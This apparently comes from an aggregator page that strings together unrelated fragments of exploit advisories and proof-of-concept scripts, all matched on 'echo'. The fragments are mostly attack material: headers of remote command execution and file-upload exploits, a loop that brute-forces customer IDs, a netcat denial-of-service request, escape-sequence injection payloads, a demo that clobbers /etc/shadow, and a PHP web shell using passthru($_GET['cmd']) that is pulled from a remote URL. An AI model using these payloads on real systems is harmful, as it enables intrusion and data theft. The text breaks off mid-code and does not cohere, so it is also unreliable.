Next Page >>
e/c/h/o
if (empty($_POST['phpinfo'] )) {
}else{
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo()";
exit;
}
if (isset($_POST['url'])) {
}
/* Starts a remote command session */
function fp_shell($crl, $sh)
{
echo "\nStarting remote command session, type 'quit' or 'exit' to exit.\n";
echo "\nremote> ";
$line = trim(fgets(STDIN));
while (($line != 'exit') && ($line != 'quit')) {
Looking inside the application source code:
###### CUT HERE ######
<style type="text/css">
body {
background-color: #<?php echo( $user_colors[ 'bg_color' ] ); ?>;
color: #<?php echo( $user_colors[ 'txt_color' ] ); ?>;
###### CUT HERE ######
It's easy to see that the "user_colors[bg_color]" is not validated and it's used directly inside an echo function.
Sending a trivial HTTP request against PHP environments having register global ON is possible to exploit this unvalidated user input flaw.
$url = $arguments['a'];
$id_pod =$arguments['b'];
$id_end =$arguments['c'];
if(count($arguments)!=3)
{
echo '## Exploit - EasyITSP by Lemens Telephone Systems 2.0.2 '."\n";
echo '## Discovery users with passwords '."\n";
echo '## '."\n";
echo '## Author: Michal Blaszczak '."\n";
echo '## Website: blaszczakm.blogspot.com '."\n";
echo '## Date: 10.10.2012 '."\n";
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "
# FCMS (Family Connections) <= 0.1.1 Remote Command Execution Exploit
# AUTHOR: ilker kandemir <ilkerkandemir[at]mynet.com>
# DOWNLOAD:http://sourceforge.net/project/showfiles.php?group_id=189733
# Thanks to rgod for the php code and Ajann for helps
";
The case is of a code equivalent to the following (for example an online
file editor script).
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ php -r 'if(substr($argv[1], -4, 4)!=".php")echo($argv[1])."\n";'
'ciccio.txt'
ciccio.txt
$ php -r 'if(substr($argv[1], -4, 4)!=".php")echo($argv[1])."\n";'
'ciccio.php'
$serch_value=$_POST['search_events_by_title']; }else{$serch_value="";}}
..
<input type="text" name="search_events_by_title" value="'.$serch_value.'"
..
<input type="hidden" name="asc_or_desc" id="asc_or_desc"
value="<?php if(isset($_POST['asc_or_desc'])) echo $_POST['asc_or_desc'];?>" />
<input type="hidden" name="order_by" id="order_by"
value="<?php if(isset($_POST['order_by'])) echo $_POST['order_by'];?>" />
------------------------[ source code end ]------------------------------------
Test:
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
> No, but you can upgrade file from read-only to read-write using /proc.
Hmm.
$ cd test
4 echo moo >cow
$ exec 3<cow
$ ll /proc/self/fd
total 0
0 dr-x------ 2 ap users 0 2009-10-29 09:00 .
0 dr-xr-xr-x 7 ap users 0 2009-10-29 09:00 ..
File 'template/ja_purity/index.php' reads data with getParam and write
it directly:
57 <?php if ($tmpTools->getParam('theme_header') &&
$tmpTools->getParam('theme_header')!='-1') : ?>
58 <link rel="stylesheet" href="<?php echo $tmpTools->templateurl();
?>/styles/header/<?php echo $tmpTools->getParam('theme_header');
?>/style.css" type="text/css" />
59 <?php endif; ?>
60 <?php if ($tmpTools->getParam('theme_background') &&
$tmpTools->getParam('theme_background')!='-1') : ?>
version:
---cut here---
<?php
if(sizeof($argv)!=4) {
echo "Usage: php5 $argv[0] <router ip addres> <port>
<admin password>\n";
exit;
}
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");
Php script "messages.php" line 482:
------------------------[ source code start ]----------------------------------
if ($_GET['msg_send'] == "0") {
echo "<select name='msg_send' class='textbox'>\n".$user_list."</select>\n";
------------------------[ source code end ]------------------------------------
Test:
-------------------------[ test code start ]-----------------------------------
$url = "http://127.0.0.1/index.php?page=cart&action=show";
$max = 1000;
for($customerid = 1; $customerid <= $max; $customerid++)
{
echo "<h3>Customerid: " . $customerid .
"</h3>\n";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, "fws_guest=" . $customerid);
Home : v4-team.com
note : this exploit for education :)
*/
echo "[+] Start...\n";
$bypfile=fopen('php.ini','w+');
$stuffile=fopen('.htaccess','w+');
if($bypfile and $stuffile!= NULL){
rem raidenhttpdudo.cmd
@echo off
color 0a
rem RaidenHTTPD 2.0.19 ulang cmd exec poc exploit
rem WebAdmin one - not enabled by default anymore
rem however works regardless of php.ini, because
rem "ulang" comes from $_GET[] and some magic_quo
total 24
lrwxrwxrwx 1 larry larry 11 Dec 7 21:48 centrify.cmd.0 -> /etc/shadow After Analyze/Refresh Computer Information is run :
root@h0g:/tmp ls -l /etc/shadow
-rwxr-xr-x 1 root shadow 165 Dec 7 21:48 /etc/shadow root@h0g:/tmp cat /etc/shadow
echo 144d823c-9c22-4d21-8446-4e2d07556177 vmware -v 2> /dev/null |grep 'VMware ESX Server' >/dev/null temp=$?
echo af43ab93-cfce-485e-b16f-0d4331e0e421 exit ${temp}
root@h0g:/tmp ls -l /etc/shadow
-rwxr-xr-x 1 root shadow 165 Dec 7 21:48 /etc/shadow root@h0g:/tmp
This sucks we clobber the contents of /etc/shadow and we don't have write permission.
#
# Researched by Andrew Horton (urbanadventurer)
# (c) MorningStar Security, 2009 http://www.morningstarsecurity.com/
if [ -z "$1" ]; then
echo "Usage: $0 <target-url>"
echo "File upload proof of concept exploit for Open Auto Classifieds
<= v 1.5.9"
echo "This will create a user with the name 'hacker' and pass
'31337' then upload a command execution shell."
echo -e "eg. $0 http://www.myweb.com/cardealer/\n"
Line 225 of file components/com_content/views/article/tmpl/form.php is
vunerable.
221 <input type="hidden" name="option" value="com_content" />
222 <input type="hidden" name="id" value="<?php echo
$this->article->id; ?>" />
223 <input type="hidden" name="version" value="<?php echo
$this->article->version; ?>" />
224 <input type="hidden" name="created_by" value="<?php echo
$this->article->created_by; ?>" />
[=] Technical details :
The dhost.exe process will consume 100% of a CPU. More than one request
can be used to lock every CPU.
Two "Connection:" headers : echo "GET / HTTP/1.0"; echo "Connection:
foo"; echo "Connection: bar"; echo; echo) | nc -vn 192.168.1.1 8028
One "Connection:" header with two values : (echo "GET / HTTP/1.0"; echo
"Connection: foo, bar"; echo; echo) | nc -vn 192.168.1.1 8028
Vulnerability overview/description:
-----------------------------------
For the purposes of debugging, DataPower provides configuration options to
echo requests received from the client. For example, XML Firewall service can
be configured to echo requests by choosing the backend as 'loopback'. Other
services like Multi Protocol Gateway and Web Service Proxy can be configured
to echo requests by setting the variable “var://service/mpgw/skip-backside” in
its processing policy.
In such configurations, the requests are not sent to a backend server. Without
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<html>
<head>
<title>JCE Joomla Extension Remote File Upload</title>
</head>
<body bgcolor="#00000">
/* MyCMS Command Execution
/* This exploit should allow you to execute commands
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
*/
echo('
/**********************************************/
/* MyCmS Command Execution */
/* by HACKERS PAL <security@soqor.net> */
/* site: http://www.soqor.net */');
if ($argc<4) {
- -rw-r--r-- 1 www www 27 Sep 10 03:49 sleep.php
127# cat .htaccess
php_value error_log /etc/
127# cat not.php
<?php
echo "only echo\n";
?>
127# cat pufff.php
<?php
echo "safe_mode=".ini_get("safe_mode")."\n";
echo "error_log=".ini_get("error_log")."\n";
On line 353 in googleanalytics.php the following vulnerable code was identified:
/**
* If this is a 404 page, track the 404 and prevent all other stuff as it's not needed.
*/
if ( is_404() ) {
echo "\t\t".'pageTracker._trackPageview("/404.html?page=" + document.location.pathname + document.location.search + "&from=" + document.referrer);'."\n";
echo "\t".'} catch(err) {}'."\n";
echo '</script>'."\n";
} else if ($wp_query->is_search && $wp_query->found_posts == 0) {
echo "\t\t".'pageTracker._trackPageview("'.get_bloginfo('url').'/?s=no-results: '.$wp_query->query_vars['s'].'&cat=no-results");'."\n";
echo "\t".'} catch(err) {}'."\n";
One of the following two Proofs Of Concept can be used in order to
verify the vulnerability.
curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload
B) "Varnish" log escape sequence injection
One of the following two Proofs Of Concept can be used in order to
-- cut --
#!/bin/sh
if [ -z $1 ] || [ -z $2 ]; then
echo "$0 addr file"
exit
fi
echo "--+ Arbitrary File Download PoC for Sourcefire 3D Defense Center
< 4.10.2.3 +--"
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 10);
ob_implicit_flush (1);
echo'<html>
<head>
<title>PHP CGI Argument Injection Remote Exploit</title>
</head>
<p align="center"><font size="4" color="#5E767E">PHP CGI Argument
Injection</font></p>
Possible issues with files in /tmp.
root@dev-unix-sec01:~/test# strings SUNWswasr-4.3.1-20130117131218.rpm |grep tmp
##Read the contents of crontab into a tmp file /usr/bin/crontab -l > /tmp/crontab_edit echo "0" > /tmp/tmpVariable
grep "/opt/SUNWswasr/bin/update_rules.sh" /tmp/crontab_edit |
echo "1" > /tmp/tmpVariable
grep "0" /tmp/tmpVariable > /dev/null
> Options:
> -p[port]: specify a port other than 80
> -P[ip:port]: specify a proxy
> Example:
> php '.$argv[0].' localhost http://www.site.com/shell.txt ls -la -P1.1.1.1:80
> shell.txt: <?php ob_clean();echo"iLker Kandemir
> www.mefistolabs.com";ini_set("max_execution_time",0);echo
> "mefistolabs";passthru($_GET["cmd"]);die;?>
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> ');
> die;
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost http://www.site.com/shell.txt ls -la -P1.1.1.1:80
shell.txt: <?php ob_clean();echo"iLker Kandemir www.mefistolabs.com";ini_set("max_execution_time",0);echo "mefistolabs";passthru($_GET["cmd"]);die;?>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
');
die;
}
Next Page>>
|
